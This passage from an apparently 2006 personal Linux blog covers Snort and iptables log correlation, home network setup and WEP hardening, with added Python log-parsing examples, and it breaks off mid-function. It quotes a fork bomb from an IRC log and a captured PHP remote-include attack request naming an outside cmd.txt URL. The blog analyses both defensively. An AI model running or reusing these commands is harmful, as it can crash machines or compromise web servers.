GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_MESA_allocate_memory,
GLX_MESA_swap_control, GLX_MESA_swap_frame_usage, GLX_OML_swap_method,
GLX_OML_sync_control, GLX_SGI_make_current_read, GLX_SGI_swap_control,
GLX_SGI_video_sync, GLX_SGIS_multisample, GLX_SGIX_fbconfig,
GLX_SGIX_pbuffer, GLX_SGIX_visual_select_group
GLX extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_OML_swap_method,
GLX_SGI_make_current_read, GLX_SGIS_multisample, GLX_SGIX_fbconfig
OpenGL vendor string: Mesa project: www.mesa3d.org
OpenGL renderer string: Mesa GLX Indirect
OpenGL version string: 1.2 (1.5 Mesa 6.2.1)
OpenGL extensions:
GL_ARB_depth_texture, GL_ARB_imaging, GL_ARB_multitexture,
GL_ARB_point_parameters, GL_ARB_point_sprite, GL_ARB_shadow,
GL_ARB_shadow_ambient, GL_ARB_texture_border_clamp,
GL_ARB_texture_cube_map, GL_ARB_texture_env_add,
GL_ARB_texture_env_combine, GL_ARB_texture_env_crossbar,
GL_ARB_texture_env_dot3, GL_ARB_texture_mirrored_repeat,
GL_ARB_transpose_matrix, GL_ARB_window_pos, GL_EXT_abgr, GL_EXT_bgra,
GL_EXT_blend_color, GL_EXT_blend_func_separate, GL_EXT_blend_logic_op,
GL_EXT_blend_minmax, GL_EXT_blend_subtract, GL_EXT_clip_volume_hint,
GL_EXT_copy_texture, GL_EXT_draw_range_elements, GL_EXT_fog_coord,
GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels, GL_EXT_point_parameters,
GL_EXT_polygon_offset, GL_EXT_rescale_normal, GL_EXT_secondary_color,
GL_EXT_separate_specular_color, GL_EXT_shadow_funcs,
GL_EXT_stencil_two_side, GL_EXT_stencil_wrap, GL_EXT_subtexture,
GL_EXT_texture, GL_EXT_texture3D, GL_EXT_texture_edge_clamp,
GL_EXT_texture_env_add, GL_EXT_texture_env_combine,
GL_EXT_texture_env_dot3, GL_EXT_texture_lod_bias, GL_EXT_texture_object,
GL_EXT_texture_rectangle, GL_EXT_vertex_array, GL_APPLE_packed_pixels,
GL_ATI_texture_env_combine3, GL_ATI_texture_mirror_once,
GL_ATIX_texture_env_combine3, GL_IBM_texture_mirrored_repeat,
GL_INGR_blend_func_separate, GL_MESA_pack_invert, GL_MESA_ycbcr_texture,
GL_NV_blend_square, GL_NV_point_sprite, GL_NV_texgen_reflection,
GL_NV_texture_rectangle, GL_SGIS_generate_mipmap,
GL_SGIS_texture_border_clamp, GL_SGIS_texture_edge_clamp,
GL_SGIS_texture_lod, GL_SGIX_depth_texture, GL_SGIX_shadow,
GL_SGIX_shadow_ambient, GL_SUN_multi_draw_arrays
glu version: 1.3
glu extensions:
GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess

visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav
id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat
----------------------------------------------------------------------
0x23 24 tc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x24 24 tc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x25 24 tc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x26 24 tc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x27 24 dc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x28 24 dc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x29 24 dc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x2a 24 dc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
bash-3.00$

It's more gibberish than anything, to me. I'll figure this out. Actually, maybe I should be hacking my more recent Dell instead.

On the laptop note, I'm seriously thinking of getting the Macintosh MacBook (13"), white edition. While the black looks nice, the price tag is $200 more than the white one, with very little hardware difference. Maybe this X-mas?!

Thursday, May 18, 2006

Talk about time lapse!

I plugged in my Toshiba that happens to be running Slackware-current. It's been off for a while and I noticed that the time was an hour or so behind, so I ran the below:

root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:05 ntpdate[2185]: step time server 198.123.30.132 offset 4042.874524 sec
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:09 ntpdate[2188]: adjust time server 198.123.30.132 offset -0.000203 sec

I know this thing has a CMOS battery. Why the hell did it lose that much time??

I also got a Dell Precision 220 from work yesterday. They were going to throw it out. It's a decent system, but a coworker stripped the RAM before I got hold of it. Unfortunately, it requires RAMBUS RAM. I'm looking now on eBay for some cheap RAMBUS RAM. The machine is dual proc capable but has one 667MHz Pentium III CPU. It is all IDE instead of SCSI like my Precision 410, but that's OK. Its internal layout is nice for a flat case. It has 2xUSB ports in the back. It has 5 PCI slots, so I can add a USB 2.0 PCI card when I get the chance. It has an integrated NIC (10/100) and came with a V770 PCI vidcard. It also has a Zip Drive. It has space for two hard disks and a CD drive. I have spare hard disks (all SCSI though). I may add SATA technology to it, though. I also grabbed a 17" CRT monitor that was about to be trashed also, and a bunch of CAT5 (that was golden, as CAT5 is expensive). I only need to decide what OS/distro I'm going to put on it...maybe NetBSD, as I already have a FreeBSD and an OpenBSD box. I also need to decide what duties this box will perform. The box has some life left, as it will take a gig of RAM and the CPU is upgradable to 1GHz.

I now need a big rack, as my systems are starting to pile up and my computer room looks horrendous!

A Dell rep or contractor will be showing up at my home tomorrow to repair my Inspiron 8500's monitor. Tomorrow is the last day of its service contract. I may renew it, as that laptop is my powerhouse machine, the most high-end system I have. My self-built tower probably has more raw horsepower (it's my gaming machine) but the Inspiron is trouble-free and does indeed have serious power at 2GHz. I usually watch my TiVo'd movies on it, crunch data on it when I boot into Slackware (it's a dual boot machine), or watch DVDs.

I'm still eyeing a Mac laptop or maybe even a Mac mini. Funds are the issue. We shall see what the near future holds for me. ;)

Monday, May 15, 2006

Another example of log correlation

Tailing my Snort logs this morning, I found the below:

[**] [1:1882:10] ATTACK-RESPONSES id check returned userid [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/14-20:05:01.237145 213.92.8.4:6667 -> 66.160.141.30:32811
TCP TTL:48 TOS:0x0 ID:41299 IpLen:20 DgmLen:212 DF
***AP*** Seq: 0xF793F39A Ack: 0xDDC1DA82 Win: 0x2180 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1184125330 36300125

I then searched for the actual payload with the below command:

tcpdump -Xvnner /var/log/snort/snort.log.1147297546 | less

I then hit the '/' button and entered the source IP (213.92.8.4), which showed me the Snort payload of this specific alert:

20:05:01.237145 00:b0:4a:6c:76:53 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 226: IP (tos 0x0, ttl 48, id 41299, offset 0, flags [DF], length: 212) 213.92.8.4.6667 > 66.160.141.30.32811: P [tcp sum ok] 4153668506:4153668666(160) ack 3720469122 win 8576
0x0000: 4500 00d4 a153 4000 3006 fbb1 d55c 0804 E....S@.0....\..
0x0010: 42a0 8d1e 1a0b 802b f793 f39a ddc1 da82 B......+........
0x0020: 8018 2180 42f8 0000 0101 080a 4694 5192 ..!.B.......F.Q.
0x0030: 0229 e55d 3a60 4265 6c69 616c 216e 3d6a .).]:`Belial!n=j
0x0040: 6f65 4036 392e 3138 322e 3234 352e 3235 oe@69.182.245.25
0x0050: 3220 5052 4956 4d53 4720 2323 736c 6163 2.PRIVMSG.##slac
0x0060: 6b77 6172 6520 3a75 6964 3d31 3030 3028 kware.:uid=1000(
0x0070: 6a6f 6529 2067 6964 3d31 3030 2875 7365 joe).gid=100(use
0x0080: 7273 2920 6772 6f75 7073 3d31 3030 2875 rs).groups=100(u
0x0090: 7365 7273 292c 3130 2877 6865 656c 292c sers),10(wheel),
0x00a0: 3137 2861 7564 696f 292c 3138 2876 6964 17(audio),18(vid
0x00b0: 656f 292c 3139 2863 6472 6f6d 292c 3230 eo),19(cdrom),20
0x00c0: 2867 616d 6573 292c 3131 2866 6c6f 7070 (games),11(flopp
0x00d0: 7929 0d0a y)..

I then decided to check my IRC bot's logs, as I've an eggdrop bot logging ##slackware on irc.freenode.net. The bot logs into the server using port 6667, which is in the payload. This is what I found:

...
[20:04]  bbiab
[20:05] <`Belial> joe@GTA:~$ id
[20:05] <`Belial> uid=1000(joe) gid=100(users) groups=100(users),10(wheel),17(audio),18(video),19(cdrom),20(games),11(floppy)
[20:05] then you got something wrong with your channels (both master and pcm are unmuted, right?)
[20:06] <`Belial> yeah
...

Nice! This wouldn't have shown up in the FW logs, as I don't track IRC with iptables. Chalk this up as a false positive.
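As an added example (not the post's own code), here is the same correlation done programmatically: rebuild the packet from the tcpdump -X hex lines, check that its addresses and ports match the Snort alert, and read the payload as an IRC PRIVMSG so the matched uid=/gid= text is seen in its real context. The alert and hex dump are retyped from this post as sample input; the TCP header walk and IRC regex are my own, and the uid=/gid= pattern is only an approximation of what sid 1882 looks for.

```python
# Added example, not the post's own code: decode the tcpdump -X dump behind a Snort
# alert and see what the matched text really was. Alert and dump retyped from the post.
import re
import socket
import struct

SNORT_ALERT = """[**] [1:1882:10] ATTACK-RESPONSES id check returned userid [**]
05/14-20:05:01.237145 213.92.8.4:6667 -> 66.160.141.30:32811
TCP TTL:48 TOS:0x0 ID:41299 IpLen:20 DgmLen:212 DF"""

TCPDUMP_HEX = r"""0x0000: 4500 00d4 a153 4000 3006 fbb1 d55c 0804 E....S@.0....\..
0x0010: 42a0 8d1e 1a0b 802b f793 f39a ddc1 da82 B......+........
0x0020: 8018 2180 42f8 0000 0101 080a 4694 5192 ..!.B.......F.Q.
0x0030: 0229 e55d 3a60 4265 6c69 616c 216e 3d6a .).]:`Belial!n=j
0x0040: 6f65 4036 392e 3138 322e 3234 352e 3235 oe@69.182.245.25
0x0050: 3220 5052 4956 4d53 4720 2323 736c 6163 2.PRIVMSG.##slac
0x0060: 6b77 6172 6520 3a75 6964 3d31 3030 3028 kware.:uid=1000(
0x0070: 6a6f 6529 2067 6964 3d31 3030 2875 7365 joe).gid=100(use
0x0080: 7273 2920 6772 6f75 7073 3d31 3030 2875 rs).groups=100(u
0x0090: 7365 7273 292c 3130 2877 6865 656c 292c sers),10(wheel),
0x00a0: 3137 2861 7564 696f 292c 3138 2876 6964 17(audio),18(vid
0x00b0: 656f 292c 3139 2863 6472 6f6d 292c 3230 eo),19(cdrom),20
0x00c0: 2867 616d 6573 292c 3131 2866 6c6f 7070 (games),11(flopp
0x00d0: 7929 0d0a y).."""

ALERT_TUPLE = re.compile(r"^\S+ (\S+):(\d+) -> (\S+):(\d+)$", re.M)
HEX_GROUP = re.compile(r"^[0-9a-f]{2,4}$")
IRC_PRIVMSG = re.compile(rb"^:([^!\s]+)!(\S+) PRIVMSG (\S+) :(.*)$")
ID_OUTPUT = re.compile(rb"uid=\d+\([^)]*\) gid=\d+\(")  # approximate id(1) shape behind sid 1882

def parse_alert(text):
    """Return (src, sport, dst, dport) from the alert's address line."""
    src, sport, dst, dport = ALERT_TUPLE.search(text).groups()
    return src, int(sport), dst, int(dport)

def hexdump_to_bytes(dump):
    """Rebuild the frame: up to eight hex groups per line, stop at the ASCII column."""
    raw = bytearray()
    for line in dump.splitlines():
        for tok in line.partition(":")[2].split()[:8]:
            if not HEX_GROUP.match(tok):
                break
            raw += bytes.fromhex(tok)
    return bytes(raw)

def decode_tcp(pkt):
    """Minimal IPv4+TCP header walk; payload is sliced by the IP total length."""
    ihl, total_len = (pkt[0] & 0x0F) * 4, struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != 6:
        raise ValueError("not a TCP segment")
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    doff = (pkt[ihl + 12] >> 4) * 4  # TCP data offset, in 32-bit words
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "payload": pkt[ihl + doff:total_len]}

def correlate(alert_text, dump):
    """Check the dump is the alerted packet, then read its payload as IRC."""
    pkt = decode_tcp(hexdump_to_bytes(dump))
    result = {"header_match": (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
              == parse_alert(alert_text), "verdict": "review: matched text not in an IRC channel message"}
    payload = pkt["payload"].rstrip(b"\r\n")
    irc = IRC_PRIVMSG.match(payload)
    if irc:
        nick, _user, target, text = (g.decode("utf-8", "replace") for g in irc.groups())
        result.update(nick=nick, target=target, text=text)
        if target.startswith("#") and ID_OUTPUT.search(payload):
            # id(1) output arriving as chat text to a channel: the post's false positive
            result["verdict"] = "false positive: id output pasted into an IRC channel"
    return result
```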

Thursday, May 11, 2006

Iptables again

During the last 3-4 days, I've been playing with Iptables:

1. I'm having an issue where my SSH sessions to wigglit.ath.cx time out. Last night, I flushed the firewall rules and left the firewall bare of rules for the night while leaving a term logged in via SSH. The session still timed out but I don't know if this is an eventual time out or something related to SSH. I don't have any rulesets related to SSH in my Iptables file (with the exception of allowing all SSH).

2. I've been testing some firewall log parsers, namely fwlogwatch and wflogs. Both are nice, but wflogs has more configuration options. Both supposedly parse Snort logs, but I haven't been able to do this with either tool. Both tools are outdated, with no activity on either project in the last few years.

3. The ##slackware bot, slackboy, doesn't start automatically when I reboot the wigglit.ath.cx server, but does throw an MSG534 error, which doesn't make sense. There's also not much Google data on this particular error, especially solutions to the issue. I've a line added in /etc/rc.d/rc.local (su ron -c /home/ron/eggdrop/eggdrop /home/ron/eggdrop/slackboy.conf) that will sometimes run and sometimes not (when I execute it manually). Today, I just ran it as a normal user in the bot's directory (eggdrop -c slackboy.conf) and it worked. Weird.

I'm also using my Linksys wifi card (the WPC54GS PCMCIA card). I've done this in the past and actually have a script that I use to initiate the card. This card has no open-source drivers so I use ndiswrapper. Here's the dmesg initiation data:

ndiswrapper version 0.11 loaded (preempt=no,smp=no)
PCI: Setting latency timer of device 03:00.0 to 64
ndiswrapper: using irq 11
wlan0: ndiswrapper ethernet device 00:0f:66:4a:42:6a using driver lsbcmnds
wlan0: encryption modes supported: WEP, WPA with TKIP, AES/CCMP
ndiswrapper: driver lsbcmnds (Cisco-Linksys ,LLC.,02/19/2004, 3.50.21.11) added

The lsbcmnds driver is a Windows driver that ndiswrapper uses. I can't use this driver for things such as Kismet, but for typical end-user work, it is functional. I'd rather not have to buy another wifi card just to be Linux-idealistic.

I also want to be able to use WPA, but I'm only using WEP at the moment. The reason for this is that my TiVo uses wireless to pull programming data. The wifi adapter that I'm using is supported by TiVo but I don't believe it has WPA capability. This is the only thing holding me back from using WPA. The adapter is a WUSB11 v2.8. I shall double-check to see if it is WPA-capable. Even so, I'd still like to eventually get away from 11B. That's going to be hard to get away from, since TiVo only has limited support for 54G.

Sunday, May 07, 2006

Whoosh, Over His Head...

|splat| http://fuckthatjob.com/ haha
NeoSadist |splat|, http://www.getbanned.org
Half-Left lol
|splat| heh
Half-Left NeoSadist, nice :-)

-- a bit later, when I was no longer away from the keyboard, I saw it, laughed, then copy/pasted into the channel --

W|GGL|T |splat| http://fuckthatjob.com/ haha
W|GGL|T NeoSadist |splat|, http://www.getbanned.org
W|GGL|T lol!
|splat| hehe
* muteW has quit ("Exeunt muteW")
* gm152 has quit (Remote closed the connection)
thrice` getbanned.org doesn't work

Of course it doesn't work...that wasn't the point NeoSadist was trying to make. Some people just don't have common sense.

Shell Scripting | Creation of a Subnet and Securing Wireless Access Points

I've been trying to automate some things on my Linux and BSD boxes, so I've been scripting a bit lately.

For one, I like the mailed stats that FreeBSD and OpenBSD provide the administrator, so I've attempted to do the same for Slackware. I've a version that also runs on BSD, although you have to hack it to get it to work under a BSD machine. I'm currently looking over it to see if I can reduce the hacking needed when using it on a non-Linux or non-Slackware machine, but for now it does work. It does not mail the admin yet, but it does keep a listing of stats every hour on the hour (via cron).

I've used several web-based resources to create this script:

http://www.linuxcommand.org/
http://www.freeos.com/guides/lsst/

I've also bought a few scripting books:

Unix Shells by Example, 3rd Edition, by Ellie Quigley
Linux Shell Scripting with Bash, by Ken O. Burtch
Learning the bash Shell, 2nd Edition, by Cameron Newham and Bill Rosenblatt

There's a ton of shell scripting books out there, along with a ton of free online tutorials, but the ones I've mentioned gave me the most insight.

I shall post a link to my script when I've finished working it to my liking.

I've also done a few things to my network during the last week.

I bought a Netgear VPN Firewall (FVS114). I want to play with hardware a bit and this unit was cheap. Sometime in the near future, I want to implement a VPN tunnel from my residence to my linode. Sure, I can implement it via open-source software but I have to start delving into hardware if I want to sell myself as a professional security consultant. Anyways, I was previously utilizing a Linksys WRT54X4 Firewall/Router/WAP as my border router/gateway, which was fine where it was, but in order to utilize the Netgear to its fullest (which I plan to do), it needed to be placed at the border, so I put the Netgear in the Linksys' place. I then put the Linksys inside my LAN, as I needed its WAP capabilities.

It took me a week to get things the way I wanted them. I wanted the Linksys on its own network, and that required creating a subnet. I opted to let it use its default network segment, 192.168.1.0/24. It pulled an IP from the Netgear (the Netgear is set up to serve IP addresses via DHCP). I was able to run a CAT5 from the Linksys to my Shuttle box and gain access to the administrative browser. Everything was going well, until I found that I couldn't ping other machines on the Linksys network segment. I spent a week trying to figure out why until I got a coworker to come over and take a look at things. He almost immediately got things working. I found that the Sygate firewall that I had installed on the Shuttle was impeding things. I turned it off and the laptop that was associated with the WAP was able to ping the Shuttle. One more problem was apparent: I wasn't able to get out to the internet on any laptop, although I could on the Shuttle. The reason? The Linksys FW was enabled. Once that was turned off, I was able to open up a browser and point it to MSN.com. Those were pretty simple solutions that any competent engineer should have been able to fix. My issue? Well, most engineers run standard tools in their work environment. I'd forgotten about the Sygate firewall, which is only installed on two of my many machines...so, it's not so standard within my network environment, so it was easy to forget. That, and I was so wrapped up with getting this setup to work that I didn't check the obvious items.

All that is left now is to add a static route on the Netgear that will allow communications from the Linksys net range.

This is a decent setup, as you always want to segregate your WAP from your network. For home users, the basic setup is fine, but I'm not a regular home user. I want to at least TRY to do things the right way.

Now, since we're talking about WAPs, I'll let you know that I'm using WEP, the protocol that's branded 'insecure'. Why am I using it? Because not all of my wireless devices can use the WPA protocol. Some people say that WEP is so insecure that you're better off not using it...that's total B.S. You always want to use security in depth anyways, which means you need to implement your security in layers to cover all potential weaknesses. Here's what I normally do:

1. Create a good, long password for the administrative GUI.

2. Either limit the DHCP pool to a very small amount (depending on how many wireless devices you have...I've at least 5, so I have a DHCP pool of 7), or turn off DHCP and assign your devices static IPs. This way, if someone gains access to your network, he has to be smart enough to get his own IP rather than have one handed to him. The lesson is to not make it easy to bust into your network.

3. Change your WEP key from time to time, maybe once a month. My Linksys will ask for any phrase and create 4 keys based on that one phrase. Rotate those every once in a while. Why do all this? The WEP key is supposedly easy to crack. A coworker of mine did attempt to crack a key. He couldn't. Many people think it is easy, but apparently it's not as easy as many people say, but in case it IS easy, rotate your keys from time to time.

4. You can use MAC address authentication. Sure, someone could spoof a MAC, but remember that we're layering security...he may spoof a MAC but he won't be able to circumvent the rest of the things you've implemented.

5. Don't broadcast your SSID. Those who know how to hack will find it anyways, but what you want to worry about is the script kiddies out there and the occasional bandwidth leech. Don't worry about the serious crackers out there, as if they wanted to pop your box, they could easily do it, with or without your basic security layering.

6. On some WAPs, you can dial down the power a bit so the wireless signal doesn't broadcast out to 2-3 blocks. Of course, when you do this, your wireless bandwidth gets throttled. Weigh the cost of this in your own mind and decide what would be best for your network. I don't throttle my signal but I do have my WAP in the basement, which does cut down on the signal. If your WAP is on the 2nd or 3rd floor of a home or building, it's going to be hard to throttle the signal to the point that others won't see it, since the WAP is physically on higher ground.

I may be missing a few wifi pointers, but I'll let others fill in the blanks. The above are the ways I keep my WAP and network secure. I hope you guys and gals can benefit from those tips.

Saturday, May 06, 2006

When Geeks Attack...

From ##Slackware, irc.freenode.net:

khaos <(' khaos <(' ')>
khaos (' ')>
* NeoSadist (n=robert@unaffiliated/neosadist) has joined ##slackware
* NoBIOS (n=everson@201.32.252.199) has joined ##slackware
khaos :(){ :|:& }; :
khaos ^^ cool thing to type into a terminal
* kerio2004 has quit (Read error: 113 (No route to host))
* MacIver smacks khaos
txt khaos, what a script kiddie moofart..
txt i hate you
txt fork bombs = gay...
txt people who say stupid crap like that in a linux channels with inexperienced people = moronic
lylo :/
* ChanServ gives channel operator status to NeoSadist
* NeoSadist sets ban on *!*n=heretic@*.dyn.grandenetworks.net
* NeoSadist has kicked khaos from ##slackware (NeoSadist)
* NeoSadist removes channel operator status from NeoSadist

Tuesday, May 02, 2006

Snort and IPTables

I'm at a loss at the below Snort log entry I saw today. I'm gonna assume that the originating IP (192.168.0.101) wasn't routed because it's a private IP address (RFC 1918). It's nice that Snort picked up on this, but now I need to find out if iptables blocked it and if I even have iptables configured to block this sort of traffic:

[**] [1:486:4] ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
05/02-10:37:22.568564 202.142.75.186 -> 66.160.141.30
ICMP TTL:45 TOS:0x0 ID:64537 IpLen:20 DgmLen:576
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:80 -> 192.168.0.101:59420
TCP TTL:45 TOS:0x0 ID:2832 IpLen:20 DgmLen:567 DF
***AP**F Seq: 0x130787C4 Ack: 0x710438B9 Win: 0x1F21 TcpLen: 32
** END OF DUMP

Additional info --

I checked the iptables logs and saw the below:

May 2 10:37:22 ***** kernel: INVALID packet: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:b0:4a:6c:76:53:08:00 SRC=202.142.75.186 DST=66.160.141.30 LEN=576 TOS=0x00 PREC=0x00 TTL=45 ID=64537 PROTO=ICMP TYPE=3 CODE=10 [SRC=66.160.141.30 DST=192.168.0.101 LEN=567 TOS=0x00 PREC=0x00 TTL=45 ID=2832 DF PROTO=TCP SPT=80 DPT=59420 WINDOW=7969 RES=0x00 ACK PSH FIN URGP=0 ]

So, the firewall saw it. The question is, what did it do with the traffic? I'll do a search on "invalid" and "iptables".

End Results --

I found the below using "iptables -L" to see if I have blocking of private addresses implemented, to prevent spoofing:

DROP all -- 192.168.0.0/16 anywhere

This was a nice investigation! :-) This is proof that firewall and IDS correlation helps a LOT in investigating strangeness.
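An added example, not the post's own code: a parser for the iptables LOG line and the Snort alert above that splits out the bracketed original datagram, confirms both records describe the same packet (matching outer and quoted IP IDs), and flags that the quoted destination is RFC 1918 space. The sample strings are retyped from this post, with the hostname left as its asterisk placeholder.

```python
# Added example, not the post's own code: parse the iptables LOG line and the Snort
# alert quoted above, confirm they describe one packet, and check the quoted datagram.
import ipaddress
import re

IPTABLES_LINE = (
    "May 2 10:37:22 ***** kernel: INVALID packet: IN=eth0 OUT= "
    "MAC=fe:fd:40:3e:e7:dc:00:b0:4a:6c:76:53:08:00 SRC=202.142.75.186 DST=66.160.141.30 "
    "LEN=576 TOS=0x00 PREC=0x00 TTL=45 ID=64537 PROTO=ICMP TYPE=3 CODE=10 "
    "[SRC=66.160.141.30 DST=192.168.0.101 LEN=567 TOS=0x00 PREC=0x00 TTL=45 ID=2832 DF "
    "PROTO=TCP SPT=80 DPT=59420 WINDOW=7969 RES=0x00 ACK PSH FIN URGP=0 ]")

SNORT_ALERT = """[**] [1:486:4] ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited [**]
05/02-10:37:22.568564 202.142.75.186 -> 66.160.141.30
ICMP TTL:45 TOS:0x0 ID:64537 IpLen:20 DgmLen:576
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:80 -> 192.168.0.101:59420
TCP TTL:45 TOS:0x0 ID:2832 IpLen:20 DgmLen:567 DF
** END OF DUMP"""

SYSLOG_HEAD = re.compile(r"^(?P<ts>\w+ +\d+ [\d:]+) (?P<host>\S+) kernel: (?P<prefix>.*?)(?P<pkt>IN=.*)$")

def parse_fields(segment):
    """KEY=VALUE tokens become entries; bare tokens (DF, ACK, PSH, FIN) collect under FLAGS."""
    fields = {"FLAGS": []}
    for tok in segment.split():
        key, eq, val = tok.partition("=")
        if eq:
            fields[key] = val
        else:
            fields["FLAGS"].append(tok)
    return fields

def parse_iptables_log(line):
    """Split syslog header, LOG prefix, outer packet and the [bracketed] original
    datagram that an ICMP error quotes (absent for non-ICMP-error packets)."""
    m = SYSLOG_HEAD.match(line)
    outer, _, inner = m["pkt"].partition("[")
    return {"ts": m["ts"], "prefix": m["prefix"].strip(), "outer": parse_fields(outer),
            "inner": parse_fields(inner.rstrip(" ]")) if inner else None}

def parse_snort_icmp_alert(text):
    """Outer IP ID plus the 5-tuple and IP ID of the quoted original datagram."""
    outer_id = int(re.search(r"^ICMP .*?ID:(\d+)", text, re.M).group(1))
    m = re.search(r"^(\S+):(\d+) -> (\S+):(\d+)\n\S+ .*?ID:(\d+)", text, re.M)
    return {"outer_id": outer_id, "orig_src": m.group(1), "orig_sport": int(m.group(2)),
            "orig_dst": m.group(3), "orig_dport": int(m.group(4)), "orig_id": int(m.group(5))}

def correlate(ipt_line, alert_text):
    """Tie the firewall record to the IDS record and summarise what the packet claims."""
    ipt, alert = parse_iptables_log(ipt_line), parse_snort_icmp_alert(alert_text)
    outer, inner = ipt["outer"], ipt["inner"]
    same_packet = (inner is not None and int(outer["ID"]) == alert["outer_id"]
                   and int(inner["ID"]) == alert["orig_id"]
                   and inner["DST"] == alert["orig_dst"] and int(inner["DPT"]) == alert["orig_dport"])
    return {
        "same_packet": same_packet,
        "log_prefix": ipt["prefix"],  # names the LOG rule that saw it ("INVALID packet:")
        "icmp_type_code": (int(outer.get("TYPE", -1)), int(outer.get("CODE", -1))),
        # the error quotes a datagram addressed into RFC 1918 space, which the post flags
        "quoted_dst_private": bool(inner) and ipaddress.ip_address(inner["DST"]).is_private,
        "quoted_src_is_our_host": bool(inner) and inner["SRC"] == outer["DST"],
        "quoted_tcp_flags": inner["FLAGS"] if inner else [],
    }
```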

Tuesday, April 25, 2006

wigglit.ath.cx and linode.com

I've a server that is hosted by Linode.com at wigglit.ath.cx . It runs Slackware. Linode.com lets you install prepackaged images of various distributions. It's very stable and I run multiple services on this machine, but mainly serve web pages.

I've IPTables implemented, along with Snort.

Today, I checked my Snort logs and saw the below:

[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
04/25-04:08:55.986986 125.243.112.130:57953 -> 66.160.141.30:80
TCP TTL:52 TOS:0x0 ID:10968 IpLen:20 DgmLen:680 DF
***AP*** Seq: 0x80425805 Ack: 0xC7958537 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1905554218 12987212

I could have checked the actual payload of this specific event but I was a bit lazy and decided to check the web logs instead. I'm seasoned enough as a security analyst to know that this was probably the typical attack on php-based services running on a webserver, but I wanted to see what actually happened to trigger this event, so I went to my web logs and grepped for the IP:

root@starchild:/var/log/apache# cat access_log | grep '125.243.112.130'
125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.linuxsystems.go.ro/cmd.txt?&cmd HTTP/1.0" 404 333

I know this attack wasn't successful for three reasons:

1. I don't have PHP on this server.
2. I don't have a PHP-based content management system installed.
3. I observed a '404' within that log entry.

This attack was most likely either a worm (lupper or lupper-based) or someone that wasn't quite smart enough to know that I wasn't running php-based services. It/he/she was attempting to get into the administrative interface and possibly deface the website.
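An added example, not the post's own code: parse the access_log entry above, pull the remote-include indicator out of the query string (a parameter whose value is an absolute URL to another host) and rate the outcome from the status code, as the post does by hand. The second log line is a constructed benign request for contrast.

```python
# Added example, not the post's own code: parse the Apache access_log entry above,
# pull the remote-include indicator out of the query string and judge it by status.
import re
from urllib.parse import parse_qsl, urlsplit

# First line is the post's entry rejoined; second is a constructed benign request
# (192.0.2.10 is documentation address space).
ACCESS_LOG = [
    '125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/PNphpBB2/'
    'includes/functions_admin.php?phpbb_root_path=http://www.linuxsystems.go.ro/cmd.txt?&cmd HTTP/1.0" 404 333',
    '192.0.2.10 - - [25/Apr/2006:04:09:10 -0400] "GET /slackware_botlogs/index.html HTTP/1.1" 200 5120',
]

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) '
                 r'(?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$')
REMOTE_SCHEMES = ("http", "https", "ftp")

def parse_clf(line):
    """Common Log Format -> dict; status as int."""
    m = CLF.match(line)
    if not m:
        raise ValueError("unparsed line: " + line)
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def remote_includes(target):
    """Query parameters whose decoded value is an absolute URL to another host:
    the shape of a PHP remote file inclusion attempt. Returns (script path, hits)."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        u = urlsplit(value)
        if u.scheme in REMOTE_SCHEMES and u.netloc:
            hits.append({"param": name, "include_host": u.netloc, "include_path": u.path})
    return parts.path, hits

def assess(line):
    """Flag RFI shape and rate the outcome from what the server answered."""
    rec = parse_clf(line)
    path, hits = remote_includes(rec["target"])
    if not hits:
        return {"ip": rec["ip"], "rfi": False, "status": rec["status"], "outcome": "no remote include in query"}
    if rec["status"] == 404:
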